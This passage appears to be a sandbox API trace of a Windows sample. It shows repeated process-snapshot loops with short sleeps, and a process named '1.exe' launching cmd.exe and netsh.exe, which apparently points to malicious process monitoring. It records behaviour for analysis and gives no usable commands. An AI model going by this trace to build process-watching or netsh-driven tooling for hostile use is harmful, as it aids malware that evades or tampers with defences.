szExeFile="svchost.exe")) returned 1 [0149.067] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.068] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.069] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.069] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0149.070] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.070] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0149.071] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0149.072] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0149.072] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0149.073] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.074] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0149.074] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0149.075] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0149.075] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0149.076] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0149.077] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0149.077] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0149.078] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0149.078] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0149.079] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0149.080] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0149.080] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.081] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0149.082] CloseHandle (hObject=0x2f8) returned 1 [0149.082] Sleep (dwMilliseconds=0x1f4) [0149.761] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2ec [0149.793] Process32FirstW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.794] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.794] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.795] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.796] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.796] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.797] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.798] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.798] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.799] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0149.799] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0149.800] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.801] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.802] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.802] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.803] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.804] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.804] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.805] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.806] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.806] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.807] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.807] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.808] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.809] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.809] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.810] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.811] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0149.811] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.812] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0149.813] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0149.813] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0149.814] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0149.814] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.815] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0149.816] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0149.816] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0149.817] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0149.818] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0149.818] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0149.819] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0149.820] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0149.820] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0149.821] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0149.821] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0149.822] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.823] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0149.823] CloseHandle (hObject=0x2ec) returned 1 [0149.823] Sleep (dwMilliseconds=0x1f4) [0150.539] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f4 [0150.578] Process32FirstW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.579] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0150.580] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0150.580] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.581] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0150.582] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.582] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0150.583] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0150.584] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0150.584] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, 